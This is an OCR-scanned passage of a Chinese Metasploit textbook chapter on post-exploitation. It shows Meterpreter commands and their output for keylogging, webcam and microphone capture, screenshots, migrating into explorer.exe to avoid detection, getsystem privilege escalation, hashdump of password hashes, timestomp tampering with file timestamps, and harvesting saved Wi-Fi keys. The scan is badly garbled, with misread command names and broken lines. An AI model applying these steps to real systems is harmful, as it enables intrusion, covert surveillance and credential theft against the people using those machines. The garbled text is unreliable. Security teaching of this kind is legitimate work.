a 隐秘 地 行动 。 
a 提升 权限 。 
a 从 内 存 中 查找 密码 。 


现在 就 开始 学 习 Metasploit 中 的 后 渗透 模块 ， 下 一 节 将 从 基础 知识 讲 起 。 


8.1 Metasploit 后 渗透 模块 的 基础 知识 


前 面 的 章节 已 经 涉及 了 一 些 后 渗透 模块 的 使 用 方法 , 不 过 现在 要 介绍 的 是 前 面 没有 提 到 过 的 EE 
功能 。 之 前 我 们 研究 的 重点 都 在 如 何 实现 对 目标 系统 的 渗透 ， 而 从 现在 开始 ,重点 要 放 在 如 何 操 
作 已 经 被 渗透 的 系统 上 。 下 一 将 从 最 基本 的 后 渗透 命令 开始 讲 起 。 


8.2 基本 后 渗透 命令 


核心 Meterpreter 命 令 指 的 是 已 经 被 Meterpreter 攻 击 载 荷 成 功 渗透 的 计算 机 向 我 们 提供 的 用 于 
后 渗透 操作 的 基本 功能 。 现 在 先 从 一 些 可 以 帮助 你 实现 后 渗透 操作 的 最 基本 的 命令 开始 。 
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8.2.1 帮助 菜单 


使 用 帮助 菜单 列 出 在 目标 上 可 以 使 用 的 所 有 命令 。 按 照 下 图 所 示 , 输入 help 或 者 ?就 可 以 打 
开 帮 助 菜单 。 


meterpreter > ? 


Core Commands 


Command Description 

? Help menu 

background Backgrounds the current session 

bgkill Kills a background meterpreter script 

bglist Lists running background scripts 

bgrun Executes a meterpreter script as a background thread 
channel Displays information or control active channels 
close Closes a channel 


disable unicode encoding Disables encoding of unicode strings 
enable unicode encoding Enables encoding of unicode strings 


exit Terminate the meterpreter session 

get timeouts Get the current session timeout values 

help Help menu 

info Displays information about a Post module 

irb Drop into irb scripting mode 

load Load one or more meterpreter extensions 

machine id Get the MSF ID of the machine attached to the session 
migrate Migrate the server to another process 

quit Terminate the meterpreter session 

read Reads data from a channel 

resource Run the commands stored in a file 

run Executes a meterpreter script or Post module 

set timeouts Set the current session timeout values 

sleep Force Meterpreter to go quiet, then re-establish session. 
transport Change the current transport mechanism 

use Deprecated alias for 'load' 

uuid Get the UUID for the current session 

write Writes data to a channel 


822 后台 命 令 


在 进行 后 渗透 任务 的 时 候 ， 有 时 也 可 能 需要 执行 其 他 任务 ( 比如 测试 男 一 个 渗透 模块 , 或 者 
运行 提升 权限 的 模块 )。 为 了 执行 新 的 任务 ， 需 要 将 当前 执行 的 Meterpreter 会 话 切换 到 后 台 ， 这 
时 就 可 以 如 下 图 所 示 使 用 packground 命 令 。 


meterpreter > background 
[*] Backgrounding session 1... 
msf exploit(rejetto hfs exec) > sessions -i 


Active sessions 


Id Type Information Connection 


1  meterpreter x86/win32 WIN-3K0U2TIJ4E0\mm @ WIN-3K0U2TIJ4E0  192.168.10.11 
2:4444 -> 192.168.10.110:49250 (192.168.10.110) 


sf exploit(rejetto hfs exec) > sessions -i 1 
[*] Starting interaction with 1... 


meterpreter > 


从 上 面 的 截图 可 以 看 出 , 我 们 已 经 成 功 将 会 话 切换 到 了 后 台 。 当 需要 将 一 个 会 话 切换 到 前 人 台 
的 时 候 ， 就 可 以 使 用 session 命 令 加 上 该 会 话 的 会 话 标识 符 ， 命 令 格式 为 sessions -i。 


8.2.3 机 器 ID 和 UUID 命令 
我 们 可 以 在 获得 的 会 话 中 输入 machine_iq 命 令 来 获取 机 器 ID ， 如 下 图 所 示 。 


meterpreter > machine id 
Machine ID: e43ad99d79dd7134b8a9e42c1683f0d5 


另外 ， 只 需 输 入 uuigd 命 令 就 可 以 查看 主机 的 UUID， 如 下 图 所 示 。 


meterpreter > uuid 
UUID: 2a35d6e656e854e0/x86=1/windows=1/2016-07-10T08:31:28Z 


8.2.4 通信 信道 的 操作 


为 了 实现 后 渗透 操作 , 我们 可 能 需要 列 出 通信 信道 ,并 指定 使 用 的 信道 。 这 些 操作 可 以 通过 
channe1 命 令 实现 ， 如 下 图 所 示 。 


meterpreter > channel -l 


Id Class Type 


1 3 stdapi process 
meterpreter » channel -r 1 
Read 134 bytes from 1: 


C: NXUsersVmmVDownloadsVabb497bd93af f9fa3379b2aaf73fc9c7-hfs2.3 288» 
C: NUsersVXmmVDownloadsVabb497bd93af f9f2a3379b2aaf73fc9c7-hfs2.3 288» 


在 上 图 中 ， 我 们 使 用 channel -1 命令 列 出 了 所 有 可 用 的 通信 信道 ， 然 后 使 用 channel -r 
[channel-id] 命 令 选 择 了 读 取 数据 的 通信 信道 。 信 道子 系统 允许 通过 所 有 的 逻辑 信道 进行 读 
取 、 列 举 、 写 入 等 操作 ， 这 些 逻 辑 信道 都 是 通过 Meterpreter 命 令 行 实现 的 通信 子 信道 


8.2.5 获取 用 户 名 和 进程 信息 EE 


一 旦 成 功 进 入 目标 系统 , 一 定 要 先 弄 清楚 现在 登录 该 系统 的 用 户 是 谁 , 侵入 的 是 系统 的 哪 一 
个 进程 。 这 些 信 息 十 分 关键 ， 因 为 我 们 将 据 此 完成 提升 权限 和 迁移 进程 。 现 在 来 看 看 如 何 获取 用 
户 名 和 进 井 程 信息 Co 


meterpreter > machine_id 

Machine ID: e43ad99d79dd7134b8a9e42c1683f0d5 
meterpreter » getuid 
Server username: WIN-3K0U2TIJ4E0\mm 


meterpreter » getpid 
Current pid: 1844 
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从 上 图 可 以 看 出 ,通过 输入 getuid 命 令 ， 我 们 得 知 系统 的 用 户 名 为 mm。 通 过 在 当前 


Meterpreter 会 话 中 输入 getpigd 命 令 , 可 以 查看 当前 进程 ID 。 现 在 使 用 ps 命令 查看 当前 Meterpreter 
会 话 所 依附 进程 的 详细 信息 。 


Tum em 


IELE] 2216 kKfqITswCZS .exe 
pData\Local\Temp\rad9B262. tmp\kKfqITswCZS .exe 


x86 2 WIN-3KOU2TIJ4E0\mm C:\Users\mm\Ap 


1 


I3 


e 


8.2.6 ”获取 系统 信息 


图 所 示 ， 现 在 所 依附 的 进程 来 自 一 个 保存 在 系统 临时 文件 夹 中 的 文件 。 


请 牢记 ,一定 要 将 Meterpreter 会 话 转移 到 一 个 安全 的 进程 上 , 例如 explorer.exe 
或 者 svchost.exe。 


可 以 像 上 一 章 那样 输入 sysinfo 命 令 以 显示 当前 系统 的 信息 ， 如 下 图 所 示 。 


可 以 使 用 如 下 


meterpreter > sysinfo 


Computer : WIN-SWIKKOTKSHX 

os : Windows 2008 (Build 6001, Service Pack 1). 
Architecture : x86 

System Language : en US 

Domain : WORKGROUP 

Logged On Users : 2 

Meterpreter : x86/win32 
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图 所 示 的 ijpconfig/ifconfig、arp 和 和 netstat 命 令 来 查看 网 络 信 息 。 


meterpreter > ipconfig 


Interface 1 


MTU 


Interface 10 


MTU 


: Software Loopback Interface 1 
Hardware MAC : 
: 4294967295 
IPv4 Address : 
IPv4 Netmask : 
IPv6 Address : 
IPv6 Netmask : 


: Intel(R) PR0/1000 MT Desktop Adapter 
Hardware MAC : 
: 1500 
IPv4 Address : 
IPv4 Netmask : 
IPv6 Address : 
IPv6 Netmask : 


00:00:00:00:00:00 


127.0.0.1 

255.0.0.0 

sl 
Tfff:ffff:ffff:ffff:ffff:Tfff:TfTT:TTTT 


08:00:27:84:55:8c 


192.168.10.109 
255.255.255.0 
fe80::187c:6989:bcc5:254f 
fTfff:ffff:ffff:ffff:: 
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使 用 ipconfig 命 令 可 以 查看 本 机 卫 地 址 和 与 网 卡 信 息 相 关 的 所 有 信息 。 这 个 命令 至 关 重 要 ， 
因为 它 可 以 显示 被 渗透 主机 所 连接 的 所 有 内 部 网 络 。 


arp 命 令 可 以 显示 所 有 和 被 渗透 主机 建立 过 连接 的 IP 地 址 ， 这 样 就 可 以 获得 更 多 关于 目标 邻 
近 系 统 的 信息 ( 例如 连接 的 广播 域 )， 这 个 过 程 如 下 图 所 示 。 


meterpreter > arp 


ARP cache 
IP address MAC address Interface 
192.168.10.1 e8:de:27:86:be:0a 10 


192.168.10.105 b0:10:41:c8:46:df 10 
192.168.10.112 08:00:27:55:fc:fa 10 
192.168.10.255 ff:ff:ff:ff:ff:ff 10 


224.0.0.22 00:00:00:00:00:00 1 
224.0.0.22 01:00:5e:00:00:16 10 
224.0.0.252 00:00:00:00:00:00 1 
224.0.0.252 01:00:5e:00:00:fc 10 
255.255.255.255 ff:ff:ff:ff:ff:ff 10 


netstat 命 令 显 示 当 前 所 有 正在 使 用 端口 以 及 运行 在 这 些 端口 上 的 进程 信息 。 它 的 执行 结果 
显示 了 在 目标 系统 上 运行 的 应 用 程序 的 详细 信息 ， 如 下 图 所 示 。 


meterpreter > netstat 

Connection list 
Proto Local address Remote address State User Inode PID/Program name 
tcp 0.0.0.0:80 0.0.0.0:* LISTEN 0 0 4/System 
tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 812/svchost.exe 
tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System 
tcp 0.0.0.0:3389 0.0.0.0:* LISTEN 0 0 1144/svchost.exe 
tcp 0.0.0.0:8081 0.0.0.0:* LISTEN 0 0 904/hfs.exe 
tcp 0.0.0.0:49152 0.0.0.0:* LISTEN 0 0 496/wininit.exe 
tcp 0.0.0.0:49153 0.0.0.0:* LISTEN 0 0 848/svchost.exe 
tcp 0.0.0.0:49154 0.0.0.0:* LISTEN 0 0 980/svchost.exe 
tcp 0.0.0.0:49155 0.0.0.0:* LISTEN 0 0 584/lsass.exe 
tcp 0.0.0.0:49156 0.0.0.0:* LISTEN 0 0 1564/svchost.exe 
tcp 0.0.0.0:49157 0.0.0.0:* LISTEN 0 0 572/services.exe 
tcp 192.168.10.109:49175 192.168.10.112:4444 ESTABLISHED 0 0 1856/notepad. exe 
tcp 192.168.10.109:49174 192.168.10.112:4444 ESTABLISHED 0 0 3432/zVAwcrHboKR. exe 
tcp 192.168.10.109:139 0.0.0.0:* LISTEN 0 0 4/System 
tcp6 — :::80 i LISTEN 0 0 4/System 
tcp6 — :::135 Ux LISTEN 0 0 812/svchost. exe 


82.8 文件 操作 命令 
输入 pwa 命 令 ， 可 以 查看 当前 的 工作 目录 ， 如 下 图 所 示 。 


meterpreter > pwd 
C: \Users\mm 


此 外 ， 还 可 以 使 用 cq 命令 来 浏览 目标 文件 夹 ， 使 用 mkqaiz 来 创建 一 个 文件 夹 ， 如 下 图 所 示 。 
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meterpreter > cd C:\\ 
meterpreter > pwd 

CcC:\ 

meterpreter > mkdir metasploit 
Creating directory: metasploit 
meterpreter > cd metasploit 
meterpreter > pwd 
C:\metasploit 


使 用 Meterpreter 中 的 uploagd 命 令 就 可 以 将 文件 上 传 到 目标 系统 ， 如 下 图 所 示 。 


meterpreter > upload /root/Desktop/test.txt C:\ 
[*] uploading : /root/Desktop/test.txt -> C:\ 
[*] uploaded : /root/Desktop/test.txt -> C:\\test.txt 


接着 还 可 以 使 用 edit 命 令 加 文件 名 实现 对 所 有 文件 的 修改 ， 如 下 图 所 示 。 


This is a test file.. Metasploit Rocks 


更 可 以 使 用 cat 命 令 查看 文件 的 内 容 ， 如 下 图 所 示 。 


meterpreter > edit C: NM test. txt 
meterpreter > cat C: NV test. txt 
This is a test file 

Metasploit Rocks 


使 用 1s 命 令 可 以 列 出 指定 目录 中 的 所 有 文件 ， 如 下 图 所 示 。 


meterpreter > ls C:\ 


Listing: C:\ 

Mode Size Type Last modified Name 

40777/rwxrwxrwx 0 dir 2008-01-19 14:15:37 40530 $Recycle.Bin 
100444/r--r--r-- 8192 fil 2016-03-24 05:06:01 +0530 BOOTSECT.BAK 

40777 / ruxruxrwx dir 2016-03-24 05:06:00 +0530 Boot 

40777 / ruxruxrwx dir 2008-01-19 17:21:52 40530 Documents and Settings 
40777 / ruxrwxrwx dir 2008-01-19 15:10:52 +0530 PerfLogs 


0 
0 
0 
40555/r-xr-xr-x 0 dir 2016-06-19 21:13:06 +0530 Program Files 
40777/rwxrwxrwx 0 dir 2008-01-19 17:21:52 40530 ProgramData 
40777/rwxrwxrwx 0 dir 2016-03-24 04:06:36 +0530 System Volume Information 
40555/r-xr-xr-x 0 dir 2016-06-19 20:27:20 40530 Users 

0 

24 


40777 / ruxruxrwx dir 2016-06-19 21:11:10 «0530 Windows 
100777 /rwxrwxrwx fil 2006-09-19 03:13:36 40530  autoexec.bat 
100444/r--r--r-- 333203 fil 2008-01-19 13:15:45 +0530 bootmgr 
100666/rw-rw-rw- 10 fil 2006-09-19 03:13:37 +0530 config.sys 


40777 / ruxrwxrwx 0 dir 2016-03-23 16:15:31 40530  inetpub 

40777/rwxrwxrwx 0 dir 2016-06-19 22:03:51 +0530 Ur c — ÓÜ 
100666/rw-rw-rw- 1387765760 fil 2016-06-20 08:42:49 40530 pagefile.sys 
100666/rw-rw-rw- 37 fil 2016-06-19 22:11:36 «0530 test.txt 
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使 用 rmair 命 令 可 以 从 目标 系统 上 删除 指定 的 文件 夹 , 使 用 rm 命令 可 以 删除 指定 的 文件 ,如 
下 图 所 示 。 


meterpreter > rm test.txt 
meterpreter > ls 

C: 
Mode Size Type Last modified Name 
40777 / ruxruxrwx 0 dir 2008-01-19 14:15:37 40530 $Recycle.Bin 
100444/r--r--r-- 8192 fil 2016-03-24 05:06:01 +0530 BOOTSECT.BAK 
40777/rwxrwxrux 0 dir 2016-03-24 05:06:00 +0530 Boot 
40777/rwxrwxrwux 0 dir 2008-01-19 17:21:52 +0530 Documents and Settings 
40777/rwxrwxrwx 0 dir 2008-01-19 15:10:52 +0530 PerfLogs 
40555/r-xr-xr-x 0 dir 2016-06-19 21:13:06 +0530 Program Files 
40777/rwxrwxrwux 0 dir 2008-01-19 17:21:52 +0530 ProgramData 
40777/rwxrwxrwx 0 dir 2016-03-24 04:06:36 +0530 System VoLume Information 
40555/r-xr-xr-x 0 dir 2016-06-19 20:27:20 +0530 Users 
40777/rwxrwxrwx 0 dir 2016-06-19 21:11:10 +0530 Windows 
100777/rwxrwxrwx 24 fil 2006-09-19 03:13:36 +0530 autoexec.bat 
100444/r--r--r-- 333203 fil 2008-01-19 13:15:45 +0530 bootmgr 
100666/rw-rw-rw- 10 fil 2006-09-19 03:13:37 40530 config.sys 
40777/rwxrwxruwx 0 dir 2016-03-23 16:15:31 +0530 inetpub 
40777/rwxrwxrux 0 dir 2016-06-19 22:03:51 +0530 metasploit 
100666/rw-rw-rw- 31387765760 fil 2016-06-20 08:42:49 +0530  pagefile.sys 


使 用 aownload 命 令 可 以 从 目标 下 载 文件 ， 如 下 图 所 示 。 


meterpreter > download creditcard.txt 
[*] downloading: creditcard.txt -» creditcard.txt 
[*] download : creditcard. txt -» creditcard. txt 


8.2.9 桌面 命令 


Metasploit 中 还 提供 了 各 种 桌面 命令 ， 例 如 桌面 列举 、 使 用 网 络 摄像 头 拍照 、 使 用 麦克 风 录 
音 、 使 用 摄像 机 录 视 频 等 。 下 面 给 出 这 些 命令 的 使 用 示例 。 


meterpreter > enumdesktops 
Enumerating all accessible desktops 


Desktops 


Session Station Name 


1 WinSta0 Screen-saver 
1 WinSta0 Default 

1 WinSta0 Disconnect 

1 WinSta0 Winlogon 


meterpreter » getdesktop 
Session 1\W\D 


使 用 enumdesktops 和 getdesktop 命 令 可 以 查看 被 渗透 主机 的 桌面 信息 : numdesktops 
命令 列 出 了 所 有 可 以 访问 的 桌面 ， 而 getdesktop 列 出 了 当前 桌面 的 相关 信息 。 
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8.2.10 ”截图 和 摄像 头 列举 


在 进行 


DESI 


图 、 摄 像 头 拍照 、 实 时 记录 视频 或 者 记录 键盘 操作 时 ， 必 须 事先 获得 客户 的 


<= 


图 所 示 。 


许可 。 不 过 可 以 使 用 snapshot 命 令 获取 当前 桌面 的 快照 ， 这 样 就 可 以 查看 目标 的 桌面 ， 如 下 


meterpreter > screenshot 
Screenshot saved to: /root/qNiFYBhp.jpeg 


可 以 按照 下 图 所 示 的 方法 查看 保存 的 图 片 。 


General 

Name: 

qNiFYBhp.jpeg 
Width: 

800 pixels 
Height: 

600 pixels 
Type: 

JPEG image 
File size: 

24.9 kB 
Folder: 


root 


Metadata 


Aperture Value: 


Exposure Time: 


Focal Length: 


Flash: 


Image Properties 


800 x 600 pixels 24.9 kB 100% 


qNiFYBhp.jpeg 


Image Edit View Go Help 
** Previous ** Next Q Q a A 5€ 


v x 


Mj Untitled - Notepad pe 
Fie Edt Format View Help 
My Password is Nipun@123| 


f7stat| | , m E 


| f Local Disk (C9) J] Untitled - Notepad A Jh nam 


2/3 


下 面 来 看 看 是 否 可 以 将 所 有 摄像 头 列 举 出 来 ， 并 查看 是 谁 在 使 用 这 个 系统 。 


Hwebcam_] 


meterpreter > webcam_list 
1: Lenovo EasyCamera 
2: UScreenCapture 


List 命 令 就 可 以 将 目标 上 的 所 有 摄像 头 列举 出 来 。 然 后 使 用 webcam_stream 


摄像 头 录制 实时 视频 ， 如 下 图 所 示 。 


meterpreter > webcam stream 
] Starting... 

[*] Preparing player... 

[*] Opening player at: bAsPojXM.html 

[*] Streaming... 
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输入 了 这 个 命令 之 后 ， 就 在 浏览 器 中 打开 了 一 个 网 络 摄像 头 ， 如 下 图 所 示 。 


Metasploit webcam.stre.. X | * 
Pd file///root/bAsPojXM html 


Most Visited v. Bloftensive Security Ñ Kali Linux "Ñ Kali Docs ‘Ñ Kali Tools MExploit-DB Aircrack-ng 


Target IP 192.168.10.105 
Start time : 2016-07-10 16:24:21 +0530 
Status 


Pan 


也 可 以 使 用 webcam_snap 命 令 拍摄 一 张 照片 ， 而 不 是 观看 实时 视频 ， 如 下 图 所 示 。 


root@mm: ~ eoo| — 

File Edi View Search Terminal Help n 
meterpreter » webcam snap 
[*] Starting... 

Got frame 
[*] Stopped 
lebcam shot saved to: /root/NTeMplrH. jpeg 
meterpreter > 
Im rp > 
meterpreter > 
meterpreter > 
meterp > 


rprete 
eterpreter > 
meterpreter > 


meterprete 
eterpreter 


> 
> 
> 
> 
eter > 
> 
> 
> 
> 
Metering Mode: 


Camera Model: 


1280 x720 pixeis 32.148 100% 
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某 些 时 候 我 们 可 能 出 于 监视 目的 需要 进行 环境 监听 ,那么 就 可 以 使 用 *ecora_mic 命 令 ， 如 
下 图 所 示 。 


meterpreter > record mic 

[*] Starting... 

[*] Stopped 

Audio saved to: /root/NrouXgVj .wav 
meterpreter > 


也 可 以 在 使 用 record_mic 命 令 的 同时 加 上 -a 作为 参数 来 指定 录音 的 长 度 , 这 个 参数 的 单位 
是 秒 。 


Meterpreter 的 另 一 个 强大 功能 是 可 以 计算 出 目标 系统 的 闲置 时 间 ， 以 此 推算 用 户 的 使 用 时 间 
表 ， 从 而 在 用 户 不 怎么 使 用 计算 机 的 时 间 段 发 起 攻击 。 这 个 功能 可 以 使 用 ialetime 命 令 实现 ， 
如 下 图 所 示 。 


meterpreter > idletime 
User has been idle for: 16 mins 43 secs 


通过 监控 目 标的 按键 敲 击 也 可 以 发 现 很 多 有 趣 的 信息 , 如 下 图 所 示 输 入 keyscan_start 命 
令 就 可 以 启动 键盘 监听 模块 。 


meterpreter > keyscan_start 
Starting the keystroke sniffer... 


几 秒 钟 之 后 ， 使 用 keyscan_qump 命 令 来 导出 键盘 记录 ， 如 下 所 示 。 


meterpreter > keyscan_dump 
Dumping captured keystrokes... 
«LWin» r «Back» notepad «Return» My Pasw «Back» sword is Nipun@123 


在 这 一 他 中 ， 我 们 已 经 学 习 了 很 多 命令 。 接 着 来 看 一 些 高 级 后 渗透 模块 。 


8.3 使 用 Metasploit 中 的 高 级 后 渗透 模块 
在 这 一 节 中 ， 我 们 将 通过 由 基本 命令 获取 的 信息 来 扩大 战果 。 


8.8.1 ”迁移 到 更 安全 的 进程 上 


正如 上 一 节 所 说 ， 现 在 的 Meterpreter 会 话 是 从 一 个 临时 文件 中 载 和 的。 一 旦 目标 系统 的 用 户 
发 现 这 个 进程 不 正常 ,他 就 会 关闭 这 个 进程 ， 这 样 就 会 把 我 们 踢 出 目标 系统 。 因 此 最 好 的 做 法 是 
将 Meterpreter 迁 移 到 更 安全 的 进程 上 ， 比 如 explorer.exe 或 者 svchost.exe ， 这 样 就 可 以 避免 被 受害 
者 发 现 。 可 以 使 用 migrate 命 令 来 完成 这 个 操作 。 首 先 使 用 ps 命令 查看 迁移 目标 进程 的 PID， 如 
下 图 所 示 。 
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1716 1896 KMFtp.exe x86 2 WIN-3KOU2TIJ4E0Nmm C:\Program Fil 
es (x86) KONICA MINOLTANFTP pecca exe 

1788 3004 conhost.exe 2 WIN-3KOU2TIJ4E0Nmm C:\Windows\Sys 
'tem32 X conhost. exe 

1844 2216 kKfqITswCZS.exe x86 2 WIN-3KO0U2TIJ4E0 Nmm C:\Users\mm\Ap 
pData\Local\Temp\ rad9B262 . tmp\kKfqITswCZS . exe 

1820 explorer.exe x64 2 WIN-3K0U2TIJ4E0\mm C:\Windows\exp 
lorer.exe 

2216 696 wscript.exe x86 2 WIN-3KOU2TIJ4E0Nmm C:\Windows\Sys 
IWOW64Nwscript.exe 


explorer.exe 的 PID 是 1896。 现 在 就 使 用 migrate 命 令 将 Meterpreter 迁 移 到 这 个 进程 ， 如 下 
图 所 示 。 


meterpreter > migrate 1896 

[*] Migrating from 1844 to 1896... 
[*] Migration completed successfully. 
meterpreter » getpid 

Current pid: 1896 

meterpreter » 


我 们 已 经 将 Meterpreter 成 功 迁移 到 了 explorer.exe 进 程 上 。 


d 迁移 进程 可 能 会 导致 权限 降低 。 


8.3.2 获取 系统 级 管理 权限 


如 果 被 成 功 渗透 的 应 用 程序 是 以 管理 员 权 限 运 行 的 ,那么 仅 输入 getsystem 命 令 就 可 以 获取 
系统 级 管理 权限 ， 如 下 图 所 示 。 


meterpreter > getuid 
Server username: DESKTOP -PESQ21SMApex 
meterpreter » getsystem 
..got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). 
meterpreter » getuid 
Server username: NT AUTHORITYNSYSTEM 
meterpreter » sysinfo 


Computer : DESKTOP -PESQ21S 

0S : Windows 10 (Build 10586). 
Architecture : x64 (Current Process is W0W64) 
System Language : en US 

Domain : WORKGROUP 

Logged On Users : 2 

Meterpreter : x86/win32 


系统 级 管理 权限 提供 了 最 高 级 别 的 管理 权限 ， 所 以 我 们 可 以 完成 目标 系统 上 的 任何 操作 。 


Q getsystem 模 块 在 比较 新 的 Windows 系 统 中 运行 不 太 稳定 ， 最 好 使 用 本 地 的 
提升 权限 方法 和 模块 来 提升 控制 权限 。 


8.3.3 使 用 hashdump 获取 密码 的 哈 希 值 
获取 了 目标 的 系统 级 管理 权限 之 后 ， 就 可 以 简单 地 输入 hashdqump 命 命令 获取 被 渗透 系统 上 登 
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录 密 码 的 哈 希 值 ， 如 下 图 所 示 。 


meterpreter > run hashdump 

[*] Obtaining the boot key... 

[*] Calculating the hboot key using SYSKEY 62e273ef3flebd94630c73c8eeb9de20... 
[*] Obtaining the user list and keys... 

[*] Decrypting user keys... 

[*] Dumping password hints... 


Apex: "1to1]5" 


[*] Dumping password hashes... 


Administrator:500:aad3b435b51404eeaad3b435b51404ee: 31d6cfe0d16ae931b73c59d7e0c08 
9c0::: 

Guest:501: aad3b435b51404eeaad3b435b51404ee: 31d6cfe0d16ae931b73c59d7e0c089c0: : : 
DefaultAccount:503: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c0 
89c0::: 

Apex: 1001: aad3b435b51404eeaad3b435b51404ee: 7a21990fcd3d759941e45c4901143d5f : : : 


找到 了 密码 的 哈 希 值 之 后 ， 就 可 以 对 目标 系统 发 起 一 次 pass-the-hash 攻 击 。 


有 关 pass-the-hash 攻 击 的 更 多 信息 ， 请 访问 https://www.offensive-security. 
i) com/metasploit-unleashed/psexec-pass-hash/。 


再 推荐 一 个 关于 pass-the-hash 攻 击 及 其 防御 措施 的 优质 教学 视频 ， 地 址 为 
https://www.youtube.com/watch?v-ROvGEk4JG94 , 


8.3.4 使 用 timestomp 修改 文件 的 访问 时 间 、 修 改 时 间 和 创建 时 间 


Metasploit 的 使 用 范围 很 广 ， 从 私人 机 构 到 执法 部 门 都 可 以 看 到 它 的 身影 。 进 行 隐秘 操作 的 
时 候 修改 文件 的 访问 时 间 、 修 改 时 间 和 创建 时 间 是 一 个 绝 佳 的 做 法 。 在 上 一 节 中 , 我们 创建 了 一 
个 名 为 creditcard.txt 的 文件 ， 现 在 就 使 用 timestomp 命 令 来 修改 它 的 属性 ， 如 下 图 所 示 。 


ni 


meterpreter » timestomp -v creditcard.txt 


Modified : 2016-06-19 23:23:15 40530 
Accessed : 2016-06-19 23:23:15 40530 
Created : 2016-06-19 23:23:15 40530 


Entry Modified: 2016-06-19 23:23:26 40530 

meterpreter » timestomp -z "11/26/1999 15:15:25" creditcard. txt 
11/26/1999 15:15:25 

[*] Setting specific MACE attributes on creditcard. txt 


这 个 文件 的 访问 时 间 是 2016-06-19 23:23:15， 可 以 使 用 参数 -z 将 这 个 时 间 修 改 为 如 上 图 所 示 
的 1999-11-26 15:15:25。 下 面 来 看 看 文件 是 否 被 成 功 修改 。 


meterpreter > timestomp -v creditcard.txt 


Modified : 1999-11-26 15:15:25 +0530 
Accessed : 1999-11-26 15:15:25 +0530 
Created : 1999-11-26 15:15:25 40530 


Entry Modified: 1999-11-26 15:15:25 40530 
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我 们 已 经 使 用 timestomp 命 令 成 功 修改 了 creditcard.txt 文 件 。 也 可 以 如 下 图 所 示 使 用 参数 -b 
将 一 个 文件 的 所 有 时 间 信 息 清空 。 
meterpreter > timestomp -b creditcard.txt 


[*] Blanking file MACE attributes on creditcard.txt 
meterpreter > timestomp -v creditcard.txt 


Modified : 2106-02-07 11:58:15 +0530 
Accessed : 2106-02-07 11:58:15 40530 
Created : 2106-02-07 11:58:15 +0530 


Entry Modified: 2106-02-07 11:58:15 40530 


3) 使 用 Limestomp 命 令 可 以 分 别 修改 文件 的 访问 时 间 、 修 改 时 间 和 创建 时 间 。 


8.4 其 他 后 渗透 模块 


Metasploit 提 供 了 超过 250 个 后 渗透 模块 ， 现 在 只 能 挑选 其 中 一 些 比较 典型 的 进行 讲解 ， 其 4 
的 模块 有 待 你 自己 去 深入 发 掘 。 


>> 


Pi 


8.4.1 使 用 Metasploit 收集 无 线 SSID 信息 


使 用 wlan_pss_list 模 块 可 以 轻松 发 现 目标 系统 附近 的 无 线 网 络 ， 这 样 就 可 以 对 目标 进行 
踩点 并 收集 更 多 的 重要 信息 ， 如 下 图 所 示 。 


meterpreter > run post/windows/wlan/wlan bss list 
[*] Number of Networks: 3 
SSID: NJ 


BSSID: e8:de:27:86:be:0a 
Type: Infrastructure 

PHY: Extended rate PHY type 
RSSI: -80 

Signal: 55 


SSID: Venkatesh 
BSSID: e4:6f:13:85:e5:74 
Type: Infrastructure 
PHY: 802.11n PHY type 
RSSI: -78 
Signal: 55 


SSID: F-201 
BSSID: 94:fb:b3:ff:a3:3b 
Type: Infrastructure 
PHY: Extended rate PHY type 


RSSI: -84 
Signal: 5 


[*] WlanAPI Handle Closed Successfully 


8.4.3 ”使 用 Metasploit 收集 Wi-Fi 密码 


跟 上 一 个 模块 类 似 ， 使 用 wlan_profile 模 块 可 以 收集 目标 系统 上 保存 的 Wi-Fi 登 录 凭证 
可 以 如 下 图 所 示 使 用 这 个 模块 。 


224 第 


章 ”社会 工程 工具 包 


在 上 图 的 <name> 标 签 中 可 以 找到 网 络 的 名 字 ， 在 <keyMaterial> 中 可 以 找到 登录 网 络 的 


密码 。 


meterpreter > run post/windows/wlan/wlan_profile 


Wireless LAN Profile Information 
GUID: (fflc4d5c-a147-41d2-91ab-5f9dlbeeedfa) Description: Realtek RTL8723BE Wire 
less LAN 802.11n PCI-E NIC State: The interface is connected to a network. 
Profile Name: ThePaandu 
<?xml version-"1.0"?» 
«WLANProfile xmlns-"http://www.microsoft.com/networking/WLAN/profile/v1l"» 
«name»ThePaanduc/name» 


«SSIDConfig» 
«SSID» 
*hex55468655061616E6475«/hex» 
*name»ThePaanduc/name» 
«/SSID» 
«/SSIDConfig» 


«connectionType-ESS«/connectionType» 
«connectionMode»autoc/connectionMode» 


<MSM> 
<security> 
<authEncryption> 
<authentication>WPA2PSK</authentication> 
<encryption>AES</encryption> 
<uUse0neX>faLse</use0neX> 
</authEncryption> 
<sharedKey> 
*«keyType»passPhrasec/keyType» 
*protected»false-/protected» 
*keyMater ia ETE. keyMaterial» 
«/sharedKey» 
«/security» 
</MSM> 


<MacRandomization xmlns="http://www.microsoft.com/networking/WLAN/profil 


e/v3"> 


8.4.3 获取 应 用 程序 列表 


Metasploit 中 内 置 了 对 各 种 应 用 程序 的 登录 凭证 采集 器 。 不 过 为 了 了 解 目 标 系统 上 都 安装 了 
需要 使 用 get_application list 模块 获取 应 用 程序 


哪些 程序 ， 


列表 ， 如 下 图 所 示 。 


meterpreter > run get application list 


Name Version 
Tools for .Net 3.5 3.11.50727 
ActivePerl 5.16.2 Build 1602 5.16.1602 


Acunetix Web Vulnerability Scanner 10.0 

Adobe Flash Player 22 NPAPI 

Adobe Reader XI (11.0.16) 

Adobe Refresh Manager 

Apple Application Support (32-bit) 

Application Insights Tools for Visual Studio 2013 
Arduino 

AzureTools.Notifications 

Behaviors SDK (Windows Phone) for Visual Studio 2013 
Behaviors SDK (Windows) for Visual Studio 2013 
Blend for Visual Studio 2013 

Blend for Visual Studio 2013 ENU resources 

Blend for Visual Studio SDK for .NET 4.5 


Blend for Visual Studio SDK for Silverlight 5 3. 10; 40218.0 
Build Tools - x86 12.0.31101 
Build Tools Language Resources - x86 12.0.31101 
Color Cop 5.4.3 

DatPlot version 1.4.8 1.4.8 

Don Bradman Cricket 14 

Driver Booster 3.2 3.2 

Dropbox 5.4.2 
Dropbox Update Helper 1.3.27.77 
Entity Framework 6.1.1 Tools for Visual Studio 2013 12.0.30610.0 


找到 所 有 的 应 用 程序 之 后 ， 就 可 以 在 目标 系统 上 运行 各 种 采集 模块 了 。 
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8.4.4 获取 Skype 密码 


